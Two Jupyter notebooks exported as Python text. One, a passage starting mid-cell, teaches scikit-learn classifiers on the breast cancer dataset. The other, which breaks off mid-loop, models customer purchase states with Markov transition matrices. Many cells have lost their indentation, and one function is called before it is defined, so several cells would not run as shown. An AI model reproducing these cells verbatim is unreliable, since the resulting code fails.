mglearn.plots.plot_2d_separator(clf, X, fill=True, eps=0.5, ax=ax, alpha=.4)
mglearn.discrete_scatter(X[:, 0], X[:, 1], y, ax=ax)
ax.set_title("{} neighbor(s)".format(n_neighbors))
ax.set_xlabel("feature 0")
ax.set_ylabel("feature 1")
axes[0].legend(loc=3)
# + id="Sa-HpCpLDIb_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 296} outputId="e1199b28-381a-4d6b-b55c-6da3b3112ae8"
from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
# stratify keeps the benign/malignant ratio identical in train and test splits
X_train, X_test, y_train, y_test = train_test_split(
    cancer.data, cancer.target, stratify=cancer.target, random_state=66)
training_accuracy = []
test_accuracy = []
# try n_neighbors from 1 to 14 (range upper bound is exclusive)
neighbors_settings = range(1, 15)
for n_neighbors in neighbors_settings:
    # build the model
    clf = KNeighborsClassifier(n_neighbors=n_neighbors)
    clf.fit(X_train, y_train)
    # record training set accuracy
    training_accuracy.append(clf.score(X_train, y_train))
    # record generalization accuracy
    test_accuracy.append(clf.score(X_test, y_test))
# plot both curves: the gap between them illustrates over/underfitting as k grows
plt.plot(neighbors_settings, training_accuracy, label="training accuracy")
plt.plot(neighbors_settings, test_accuracy, label="test accuracy")
plt.ylabel("Accuracy")
plt.xlabel("n_neighbors")
plt.legend()
# + [markdown] id="Hx7EmNU1DIcD" colab_type="text"
# ### Support vector machine (SVM) and Logistic regression
# + id="OrEt5mvRDIcE" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 328} outputId="f01fb2b8-3267-49e2-87ed-2e6e65ab22d9"
from sklearn.linear_model import LogisticRegression
from sklearn.svm import LinearSVC
X, y = mglearn.datasets.make_forge()
fig, axes = plt.subplots(1, 2, figsize=(10, 3))
for model, ax in zip([LinearSVC(), LogisticRegression()], axes):
clf = model.fit(X, y)
mglearn.plots.plot_2d_separator(clf, X, fill=False, eps=0.5,
ax=ax, alpha=.7)
mglearn.discrete_scatter(X[:, 0], X[:, 1], y, ax=ax)
ax.set_title("{}".format(clf.__class__.__name__))
ax.set_xlabel("Feature 0")
ax.set_ylabel("Feature 1")
axes[0].legend()
# + hide_input=false id="_DKe4jv_DIcI" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 263} outputId="57381ae9-b099-468b-b5db-6da2df0cddcd"
mglearn.plots.plot_linear_svc_regularization()
# + id="d7mcXViPDIcQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="78b224cf-38cb-4d79-ada2-bca7890083be"
from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, stratify=cancer.target, random_state=42)
logreg = LogisticRegression(C=0.001).fit(X_train, y_train)
print("Training set score: {:.3f}".format(logreg.score(X_train, y_train)))
print("Test set score: {:.3f}".format(logreg.score(X_test, y_test)))
# + id="bas4iv2qDIcX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="9cae4b89-a846-4d14-dadb-7ce9b300df2f"
logreg100 = LogisticRegression(C=100).fit(X_train, y_train)
print("Training set score: {:.3f}".format(logreg100.score(X_train, y_train)))
print("Test set score: {:.3f}".format(logreg100.score(X_test, y_test)))
# + id="OXphoI9hDIcd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="f170e863-81be-42de-a47a-60469d518bff"
logreg001 = LogisticRegression(C=0.01).fit(X_train, y_train)
print("Training set score: {:.3f}".format(logreg001.score(X_train, y_train)))
print("Test set score: {:.3f}".format(logreg001.score(X_test, y_test)))
# + id="9a2l6xGNDIch" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 389} outputId="add9116a-7b79-422a-b01f-7592a3812d3f"
# Compare logistic-regression coefficients across regularization strengths.
# fix: the legend labels did not match the C values the models were fit with —
# `logreg` was fit with C=0.001 and `logreg001` with C=0.01 (see the cells above).
plt.plot(logreg.coef_.T, 'o', label="C=0.001")
plt.plot(logreg100.coef_.T, '^', label="C=100")
plt.plot(logreg001.coef_.T, 'v', label="C=0.01")
plt.xticks(range(cancer.data.shape[1]), cancer.feature_names, rotation=90)
xlims = plt.xlim()
# horizontal zero line for reference
plt.hlines(0, xlims[0], xlims[1])
plt.xlim(xlims)
plt.ylim(-5, 5)
plt.xlabel("Feature")
plt.ylabel("Coefficient magnitude")
plt.legend()
# + id="Zrr9IOkdDIcl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 613} outputId="3b1165b7-fbb5-454f-f964-1b560faaf184"
for C, marker in zip([0.001, 1, 100], ['o', '^', 'v']):
lr_l1 = LogisticRegression(C=C, penalty="l1").fit(X_train, y_train)
print("Training accuracy of l1 logreg with C={:.3f}: {:.2f}".format(
C, lr_l1.score(X_train, y_train)))
print("Test accuracy of l1 logreg with C={:.3f}: {:.2f}".format(
C, lr_l1.score(X_test, y_test)))
plt.plot(lr_l1.coef_.T, marker, label="C={:.3f}".format(C))
plt.xticks(range(cancer.data.shape[1]), cancer.feature_names, rotation=90)
xlims = plt.xlim()
plt.hlines(0, xlims[0], xlims[1])
plt.xlim(xlims)
plt.xlabel("Feature")
plt.ylabel("Coefficient magnitude")
plt.ylim(-5, 5)
plt.legend(loc=3)
# + [markdown] id="xQqv0EFPDIcp" colab_type="text"
# ## Exercise 2.1
# #### 1. Plot the receiver operating characteristic curve, i.e. ROC curve (True positive rates vs False Positive rates)
# #### 2. Calculate AUCs for SVC and Logistic Regression.
# + id="GYPFWZpUWAXh" colab_type="code" colab={}
from sklearn.metrics import roc_curve, roc_auc_score
# + id="BZLYZbZsDIcq" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 336} outputId="aee2d12d-4ce6-422a-944c-c15f2bb5292c"
logreg100 = LogisticRegression(C=100).fit(X_train, y_train)
# probability of the positive class (column 1 of predict_proba)
yhat = logreg100.predict_proba(X_test)
# fix: sklearn's roc_curve returns (fpr, tpr, thresholds) in that order;
# the original assigned them to swapped names, which was misleading
fpr, tpr, thres = roc_curve(y_test, yhat[:, 1])
plt.plot(fpr, tpr)
# chance-level diagonal for reference
plt.plot(np.arange(0,1, 0.1,), np.arange(0, 1, 0.1))
print(roc_auc_score(y_test, yhat[:, 1]))
# + [markdown] id="jL-2gc_uDIcu" colab_type="text"
# ### Decision trees
#
# Install graphviz module using:
#
# conda install graphviz
#
# conda install python-graphviz
# + hide_input=false id="ShkVg9_IDIcv" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 269} outputId="4d05293f-6f51-416d-945c-049acb873701"
mglearn.plots.plot_animal_tree()
# + [markdown] id="cbeB3jIxDIc0" colab_type="text"
# ##### Building decision trees
# Decision Tree Algorithm Pseudocode
#
# Place the best attribute of our dataset at the root of the tree.
# Split the training set into subsets. Subsets should be made in such a way that each subset contains data with the same value for an attribute.
# Repeat step 1 and step 2 on each subset until you find leaf nodes in all the branches of the tree.
#
# + hide_input=false id="K6fiwukxDIc1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 986} outputId="0dfc6f6f-bc30-493d-f059-7e5bd87bdd0a"
mglearn.plots.plot_tree_progressive()
# + [markdown] id="ZjgRespaDIc8" colab_type="text"
# ##### Controlling complexity of decision trees
# + uuid="6e5d7a76-9bba-42f7-b26e-907775d289b2" id="mpVx3UGhDIc9" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="5b949860-ad2e-4f9d-d79e-54dcb46a5d6d"
from sklearn.tree import DecisionTreeClassifier
cancer = load_breast_cancer()
X_train, X_test, y_train, y_test = train_test_split(
    cancer.data, cancer.target, stratify=cancer.target, random_state=42)
# unrestricted tree: grows until all leaves are pure, so it memorizes the
# training set (training accuracy will be 1.0) and generalizes worse
tree = DecisionTreeClassifier(random_state=0)
tree.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(tree.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(tree.score(X_test, y_test)))
# + id="tIAj2HB1DIdC" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="cfbb7be1-1a55-441b-ffb0-f1f02050edaa"
# pre-pruned tree: limiting depth to 4 trades training accuracy for generalization
tree = DecisionTreeClassifier(max_depth=4, random_state=0)
tree.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(tree.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(tree.score(X_test, y_test)))
# + [markdown] id="Cae1PkIVDIdF" colab_type="text"
# #### Analyzing Decision Trees
# + id="B3DZfQwWDIdG" colab_type="code" colab={}
from sklearn.tree import export_graphviz
# fix: class_names must name the target classes in ascending class order
# (0 = malignant, 1 = benign for load_breast_cancer); the original passed
# feature-name strings ("mean area", "worst area"), mislabeling every node.
export_graphviz(tree, out_file="tree.dot", class_names=["malignant", "benign"],
                feature_names=cancer.feature_names, impurity=False, filled=True)
# + id="4bGTTeWMDIdI" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 677} outputId="604f9a9d-66c6-4a2e-9275-fa76fd45db4d"
import graphviz
with open("tree.dot") as f:
dot_graph = f.read()
display(graphviz.Source(dot_graph))
# + [markdown] id="uj7d9UBQDIdM" colab_type="text"
# #### Feature Importance in trees
# + uuid="dc2f68ee-0df0-47ed-b500-7ec99d5a0a5d" id="e6D8wZB0DIdN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="5c7dd212-2a04-457e-dbff-ff0d81e3929c"
print("Feature importances:\n{}".format(tree.feature_importances_))
# + id="s2Fd7nuuDIdS" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="12257343-62f6-42ee-ec38-e947aa00ba33"
def plot_feature_importances_cancer(model):
    """Draw a horizontal bar chart of a fitted model's feature importances.

    Relies on the module-level ``cancer`` dataset for the feature count and
    the y-axis labels; ``model`` must expose ``feature_importances_``.
    """
    num_feats = cancer.data.shape[1]
    positions = np.arange(num_feats)
    plt.barh(range(num_feats), model.feature_importances_, align='center')
    plt.yticks(positions, cancer.feature_names)
    plt.xlabel("Feature importance")
    plt.ylabel("Feature")
    plt.ylim(-1, num_feats)
plot_feature_importances_cancer(tree)
# + hide_input=false id="6LM8Xw3YDIdb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 568} outputId="7397e209-e680-4d4f-9f1f-2238d11487d3"
tree = mglearn.plots.plot_tree_not_monotone()
display(tree)
# + [markdown] id="8zb02UUgDIdf" colab_type="text"
# #### Ensembles of Decision Trees
# ##### Random forests
# ###### Building random forests
# ###### Analyzing random forests
# + uuid="b84dcdfe-994f-4a3d-842e-830153eefc59" id="GiMHlsecDIdg" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 119} outputId="b9b174c7-bce5-4f32-8c48-fcf907f92754"
from sklearn.ensemble import RandomForestClassifier
from sklearn.datasets import make_moons
X, y = make_moons(n_samples=100, noise=0.25, random_state=3)
X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y,
random_state=42)
forest = RandomForestClassifier(n_estimators=10, random_state=2)
forest.fit(X_train, y_train)
# + id="RiN-xHfgDIdq" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="d134924d-f656-451c-ee94-d82ccfe2b44e"
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, random_state=0)
forest = RandomForestClassifier(n_estimators=100, random_state=0)
forest.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(forest.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(forest.score(X_test, y_test)))
# + uuid="76ce4154-b441-475e-97e3-1b507964eb29" id="beZGXN0ZDIdl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 623} outputId="bdc35457-3eea-437b-c4fc-60e8cb4d9229"
fig, axes = plt.subplots(2, 3, figsize=(20, 10))
for i, (ax, tree) in enumerate(zip(axes.ravel(), forest.estimators_)):
ax.set_title("Tree {}".format(i))
mglearn.plots.plot_tree_partition(X_train, y_train, tree, ax=ax)
mglearn.plots.plot_2d_separator(forest, X_train, fill=True, ax=axes[-1, -1],
alpha=.4)
axes[-1, -1].set_title("Random Forest")
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
# + id="JCvsomr9DIdw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="08b130d3-6fc3-47b8-9cb4-3cdc8250f227"
plot_feature_importances_cancer(forest)
# + [markdown] id="fp3OIcC0DId2" colab_type="text"
# ###### Strengths, weaknesses, and parameters
# + [markdown] id="YjvuVuKADId3" colab_type="text"
# #### Gradient Boosted Regression Trees (Gradient Boosting Machines)
# + id="PLKcLzQoDId6" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="674981f1-3c52-4da1-ecd9-fccc9497e04b"
from sklearn.ensemble import GradientBoostingClassifier
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, random_state=0)
gbrt = GradientBoostingClassifier(random_state=0)
gbrt.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(gbrt.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(gbrt.score(X_test, y_test)))
# + id="-RgOwvDUDId-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="b2f4535e-00eb-46ba-e773-4317c6ac8b7a"
gbrt = GradientBoostingClassifier(random_state=0, max_depth=2)
gbrt.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(gbrt.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(gbrt.score(X_test, y_test)))
# + id="QejX-NLNDIeF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="5b50c262-dbb9-4f3a-d70e-0788ac07aafa"
gbrt = GradientBoostingClassifier(random_state=0, learning_rate=0.01)
gbrt.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(gbrt.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(gbrt.score(X_test, y_test)))
# + id="oq4fT88LDIeJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="4259bb01-0991-4b6f-ae88-f60dab0e8c19"
gbrt = GradientBoostingClassifier(random_state=0, max_depth=1, learning_rate = 0.1)
gbrt.fit(X_train, y_train)
plot_feature_importances_cancer(gbrt)
# + id="gZw1ySvTYKIb" colab_type="code" colab={}
# + [markdown] id="lA9pQyFLDIeQ" colab_type="text"
# ### Neural Networks (Deep Learning)
# #### The Neural Network Model
# + hide_input=false id="MQzj3TIKDIeR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 389} outputId="505ecf8b-df00-4c13-ad6b-6a35150ead40"
display(mglearn.plots.plot_logistic_regression_graph())
# + hide_input=false id="T909Vmm9DIeV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 389} outputId="ff98ccd4-6970-4713-bc66-43b5038dee84"
display(mglearn.plots.plot_single_hidden_layer_graph())
# + id="oXzAbdh6DIeY" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="b28b9746-e758-44d0-f7f6-168bcf2399b0"
line = np.linspace(-3, 3, 100)
plt.plot(line, np.tanh(line), label="tanh")
plt.plot(line, np.maximum(line, 0), label="relu")
plt.legend(loc="best")
plt.xlabel("x")
plt.ylabel("relu(x), tanh(x)")
# + hide_input=false id="Rf92-ckBDIeb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 389} outputId="3927438f-e329-4a5b-a566-ada2298bdd49"
mglearn.plots.plot_two_hidden_layer_graph()
# + [markdown] id="73zTpUugDIee" colab_type="text"
# #### Tuning Neural Networks
# + id="RYxYMLToDIef" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 299} outputId="f8408da2-24ea-4e0d-9535-359604b428ec"
from sklearn.neural_network import MLPClassifier
from sklearn.datasets import make_moons
X, y = make_moons(n_samples=100, noise=0.25, random_state=3)
X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y,
random_state=42)
mlp = MLPClassifier(solver='lbfgs', random_state=0).fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
plt.xlabel("Feature 0")
plt.ylabel("Feature 1")
# + id="BUTqau_ZDIej" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 299} outputId="195ba948-8657-44d6-b94e-51198440ede3"
mlp = MLPClassifier(solver='lbfgs', random_state=0, hidden_layer_sizes=[10])
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
plt.xlabel("Feature 0")
plt.ylabel("Feature 1")
# + id="UNgl9BIlDIep" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 299} outputId="1876f935-fb34-499d-ea50-63401f386691"
# using two hidden layers, with 10 units each
mlp = MLPClassifier(solver='lbfgs', random_state=0,
hidden_layer_sizes=[10, 10])
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
plt.xlabel("Feature 0")
plt.ylabel("Feature 1")
# + id="2iljVriJDIes" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 299} outputId="1abb493b-f855-4dbd-c320-263234b82a28"
# using two hidden layers, with 10 units each, now with tanh nonlinearity.
mlp = MLPClassifier(solver='lbfgs', activation='tanh',
random_state=0, hidden_layer_sizes=[10, 10])
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
plt.xlabel("Feature 0")
plt.ylabel("Feature 1")
# + id="Hn7lXZVlDIex" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 515} outputId="9eee3eeb-125c-44a8-ebc3-6ca932d0836b"
fig, axes = plt.subplots(2, 4, figsize=(20, 8))
for axx, n_hidden_nodes in zip(axes, [10, 100]):
for ax, alpha in zip(axx, [0.0001, 0.01, 0.1, 1]):
mlp = MLPClassifier(solver='lbfgs', random_state=0,
hidden_layer_sizes=[n_hidden_nodes, n_hidden_nodes],
alpha=alpha)
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3, ax=ax)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train, ax=ax)
ax.set_title("n_hidden=[{}, {}]\nalpha={:.4f}".format(
n_hidden_nodes, n_hidden_nodes, alpha))
# + id="ur4xb38TDIe1" colab_type="code" colab={}
fig, axes = plt.subplots(2, 4, figsize=(20, 8))
for i, ax in enumerate(axes.ravel()):
mlp = MLPClassifier(solver='lbfgs', random_state=i,
hidden_layer_sizes=[100, 100])
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3, ax=ax)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train, ax=ax)
# + id="S-NJHHPdDIe8" colab_type="code" colab={}
print("Cancer data per-feature maxima:\n{}".format(cancer.data.max(axis=0)))
# + id="Q8ducvPBDIfD" colab_type="code" colab={}
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, random_state=0)
mlp = MLPClassifier(random_state=42)
mlp.fit(X_train, y_train)
print("Accuracy on training set: {:.2f}".format(mlp.score(X_train, y_train)))
print("Accuracy on test set: {:.2f}".format(mlp.score(X_test, y_test)))
# + id="cRzIUXP1DIfH" colab_type="code" colab={}
# compute the mean value per feature on the training set
mean_on_train = X_train.mean(axis=0)
# compute the standard deviation of each feature on the training set
std_on_train = X_train.std(axis=0)
# subtract the mean, and scale by inverse standard deviation
# afterward, mean=0 and std=1
X_train_scaled = (X_train - mean_on_train) / std_on_train
# use THE SAME transformation (using training mean and std) on the test set
X_test_scaled = (X_test - mean_on_train) / std_on_train
mlp = MLPClassifier(random_state=0)
mlp.fit(X_train_scaled, y_train)
print("Accuracy on training set: {:.3f}".format(
mlp.score(X_train_scaled, y_train)))
print("Accuracy on test set: {:.3f}".format(mlp.score(X_test_scaled, y_test)))
# + id="6MiU0GnVDIfM" colab_type="code" colab={}
mlp = MLPClassifier(max_iter=1000, random_state=0)
mlp.fit(X_train_scaled, y_train)
print("Accuracy on training set: {:.3f}".format(
mlp.score(X_train_scaled, y_train)))
print("Accuracy on test set: {:.3f}".format(mlp.score(X_test_scaled, y_test)))
# + id="JMC4lBoUDIfQ" colab_type="code" colab={}
mlp = MLPClassifier(max_iter=1000, alpha=1, random_state=0)
mlp.fit(X_train_scaled, y_train)
print("Accuracy on training set: {:.3f}".format(
mlp.score(X_train_scaled, y_train)))
print("Accuracy on test set: {:.3f}".format(mlp.score(X_test_scaled, y_test)))
# + id="MlDacqMyDIfV" colab_type="code" colab={}
plt.figure(figsize=(20, 5))
plt.imshow(mlp.coefs_[0], interpolation='none', cmap='viridis')
plt.yticks(range(30), cancer.feature_names)
plt.xlabel("Columns in weight matrix")
plt.ylabel("Input feature")
plt.colorbar()
# + [markdown] id="4WUIbQ7yDIfY" colab_type="text"
# ## Exercise 2.2
#
# Apply the above classification methods to the breast cancer dataset. Try different hyper-parameters. Find the best method/parameter set combination that yields the best test classification result in terms of AUC.
# + id="WIvbyYX4DIfZ" colab_type="code" colab={}
| 25,814 |
/Markov Chain.ipynb
|
bae4f06d133c7969dfa50dab2d1ff5dab26e86c2
|
[] |
no_license
|
virat183/Marketing-Data-Science
|
https://github.com/virat183/Marketing-Data-Science
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 93,734 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python [conda root]
# language: python
# name: conda-root-py
# ---
# +
from collections import Counter
# %matplotlib inline
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# +
# Load the raw purchase log: tab-separated, columns are customer id,
# purchase amount, and ISO-style date string.
transactions = pd.read_csv("purchases.txt", delimiter="\t", header=None)
transactions.columns = ['cust_id', 'purchase_amt', 'date']
# year is the first 4 characters of the date string, kept as a string
transactions['year'] = transactions['date'].apply(lambda x: x[:4])
transactions['purchase_amt'] = transactions['purchase_amt'].apply(lambda x: float(x))
transactions.head()
# +
fig, axs = plt.subplots(1,1, figsize = (10,5))
axs.hist(transactions['purchase_amt'], bins=50);
axs.set_title('Histogram of Purchase Amounts');
axs.set_xlabel("Purchase Amount (Dollars)");
axs.set_ylabel("Count");
# -
# collapse to one row per (customer, year): total spend that year
transactions = transactions.groupby(['cust_id', 'year'])['purchase_amt'].sum().reset_index()
purchase_amts = transactions['purchase_amt']
purchase_amts.mean()
# customer x year matrix: 1 if the customer purchased that year, else 0
boolean_matrix = pd.crosstab(transactions.cust_id, [transactions.year], rownames=['cust_id'], colnames=['year'])
boolean_matrix = boolean_matrix.applymap(lambda x: 1 if x>0 else 0)
# restrict to the 2005 cohort: customers with at least one purchase in 2005
boolean_matrix_restricted = boolean_matrix[boolean_matrix['2005'] == 1]
boolean_matrix_restricted.head()
recency_matrix, RFM_matrix = build_recency_and_RFM_matrix(boolean_matrix_restricted, transactions)
# +
frequencies = []
for row in RFM_matrix:
for cell_value in row:
frequencies.append(cell_value[1])
# +
recency_df = pd.DataFrame(np.array(recency_matrix))
recency_df.index = boolean_matrix_restricted.index
recency_df.columns = boolean_matrix_restricted.columns
recency_df.head()
# -
total_at_recency_dict = {}
total_transition_recencies_dict = {}
# +
# dictionary mapping RFM tuples to numbered states
RFM_states = {(1, 1, 1): 1,
(1, 1, 2): 2,
(1, 1, 3): 3,
(1, 2, 1): 4,
(1, 2, 2): 5,
(1, 2, 3): 6,
(2, 1, 1): 7,
(2, 1, 2): 8,
(2, 1, 3): 9,
(2, 2, 1): 10,
(2, 2, 2): 11,
(2, 2, 3): 12,
(3, 1, 1): 13,
(3, 1, 2): 14,
(3, 1, 3): 15,
(3, 2, 1): 16,
(3, 2, 2): 17,
(3, 2, 3): 18}
# +
state_matrix = convert_to_state_matrix(RFM_matrix, RFM_states)
state_df = pd.DataFrame(np.array(state_matrix))
state_df.columns = boolean_matrix_restricted.columns
state_df.index = boolean_matrix_restricted.index
state_df.head()
# -
# build transition matrix for recency
# For each recency score, count how many customer-years were observed at that
# score and what recency they had the following year, pooled over all years.
for recency_score in range(11):
    total_at_recency = 0
    total_transition_states_observed = Counter()
    for year in state_df.columns:
        # no data for 2016 so leave 2015 out
        if year == '2015':
            break
        # reduce dataframe to people who were in this state this year
        this_recency_this_year = recency_df[recency_df[year] == recency_score]
        # total number of people observed in this state this year
        total_this_recency_this_year = this_recency_this_year.shape[0]
        total_at_recency += total_this_recency_this_year
        # get count of states observed the next year
        next_year = str(int(year) + 1)
        observed_recencies_next_year = Counter(list(this_recency_this_year[next_year]))
        total_transition_states_observed += observed_recencies_next_year
    # pooled counts: denominator and next-year recency distribution per score
    total_at_recency_dict[recency_score] = total_at_recency
    total_transition_recencies_dict[recency_score] = total_transition_states_observed
# +
# build recency transition matrix
# entry [i, j] = empirical P(recency j next year | recency i this year)
recency_transition_matrix = np.zeros((11,11))
# NOTE(review): rows only run 0..9 — recency 10 can first occur in 2015,
# which the counting loop above excluded, so total_at_recency_dict[10] is 0
# and including it would divide by zero; row 10 is deliberately left all-zero.
for i in range(10):
    for j in range(11):
        transition_prob = total_transition_recencies_dict[i][j] / total_at_recency_dict[i]
        recency_transition_matrix[i, j] = transition_prob
# -
pd.DataFrame(recency_transition_matrix)
# +
frequencies = []
for row in RFM_matrix:
for cell_value in row:
frequencies.append(cell_value[1])
# +
# some useful functions
def build_recency_and_RFM_matrix(boolean_matrix, transactions):
    '''
    INPUT:
        boolean_matrix: DataFrame with customer ids as the index and years
            (strings) as columns. Cell value 1 if the customer made a
            purchase in that year, 0 otherwise.
        transactions: DataFrame with columns 'cust_id', 'year',
            'purchase_amt', already aggregated to one row per customer/year.
    OUTPUT:
        recency matrix: list of rows giving each customer's recency score
            (years since last purchase) per year.
        RFM matrix: list of rows giving each customer's
            (recency, frequency, monetary) tuple per year; monetary carries
            forward the most recent purchase-year total.
    '''
    recency_matrix = []
    RFM_matrix = []
    for row_num, boolean_row in enumerate(boolean_matrix.values):
        cust_id = int(boolean_matrix.index[row_num])
        frequency = 0
        recency = 0
        # fix: monetary was previously unbound until the first purchase year,
        # raising NameError for any customer whose first visible year had no
        # purchase; start it at 0.0 instead.
        monetary = 0.0
        recency_row = []
        RFM_row = []
        for col_num, cell_value in enumerate(boolean_row):
            year = boolean_matrix.columns[col_num]
            if cell_value == 1:
                transactions_by_cust = transactions[transactions['cust_id']==cust_id]
                transactions_by_cust_by_year = transactions_by_cust[transactions_by_cust['year'] == year]
                # .sum() gives the same value as float(single-row Series) but
                # does not rely on the deprecated float(Series) conversion
                monetary = float(transactions_by_cust_by_year['purchase_amt'].sum())
                frequency += 1
                recency = 0
            else:
                recency+=1
            recency_row.append(recency)
            RFM_row.append((recency, frequency, monetary))
        recency_matrix.append(recency_row)
        RFM_matrix.append(RFM_row)
    return recency_matrix, RFM_matrix
def convert_to_discrete_tuple(continuous_tuple):
    '''
    INPUT: continuous (recency, frequency, monetary) tuple for a customer
    OUTPUT: discrete (R, F, M) tuple under the segmentation we defined:
        R: 1 if recency <= 0, 2 if under 6 years, else 3
        F: 1 if more than 5 purchase-years, else 2
        M: 1 if spend > 50, 2 if spend > 30, else 3
    '''
    recency, frequency, monetary = continuous_tuple
    if recency <= 0:
        R = 1
    elif recency < 6:
        R = 2
    else:
        R = 3
    F = 1 if frequency > 5 else 2
    if monetary > 50:
        M = 1
    elif monetary > 30:
        M = 2
    else:
        M = 3
    return R, F, M
def convert_to_state_matrix(continuous_tuple_matrix, RFM_states):
    '''
    INPUT:
        continuous_tuple_matrix: matrix (list of rows) of continuous RFM
            tuples, one per user/year
        RFM_states: dictionary mapping discrete RFM tuples to state numbers
    OUTPUT:
        matrix of state numbers, same shape as the input matrix
    '''
    return [
        [RFM_states[convert_to_discrete_tuple(rfm_tuple)] for rfm_tuple in row]
        for row in continuous_tuple_matrix
    ]
# Map every user/year RFM tuple onto its discrete state number.
state_matrix = convert_to_state_matrix(RFM_matrix, RFM_states)
# +
from collections import Counter
# dictionary that maps states to the total customers observed in that state
# key: state number
# value: integer giving total number
total_in_state_dict = {}
# dictionary that maps states to the distribution of states the year following
# key: state number
# value: counter of states the following year
total_transition_states_dict = {}
# +
# build transition matrix for RFMs
# For every state 1..18 count (a) how many customer-years were observed in
# that state and (b) the states those customers landed in one year later.
for state in range(1, 19):
    total_in_state = 0
    total_transition_states_observed = Counter()
    for year in state_df.columns:
        # no data for 2016 so leave 2015 out
        if year == '2015':
            break
        # reduce dataframe to people who were in this state this year
        this_state_this_year = state_df[state_df[year] == state]
        # total number of people observed in this state this year
        total_this_state_this_year = this_state_this_year.shape[0]
        total_in_state += total_this_state_this_year
        # get count of states observed the next year
        next_year = str(int(year) + 1)
        observed_states_next_year = Counter(list(this_state_this_year[next_year]))
        total_transition_states_observed += observed_states_next_year
    total_in_state_dict[state] = total_in_state
    total_transition_states_dict[state] = total_transition_states_observed

total_in_state_dict
# -
total_transition_states_dict
# +
# build transition matrix
# 18 x 18 matrix; entry [i-1, j-1] = P(state j next year | state i this year).
RFM_transition_matrix = np.zeros((18,18))
# BUG FIX: the original looped over range(1, 18), which skipped state 18
# entirely and left its row and column all zeros -- including the absorbing
# diagonal entry. States are numbered 1..18 (see the range(1, 19) used when
# building the count dictionaries), so both loops must run over range(1, 19).
for i in range(1, 19):
    for j in range(1, 19):
        # absorbtion states: states 13-18 stay where they are with certainty
        if i >= 13 and i == j:
            transition_prob = 1
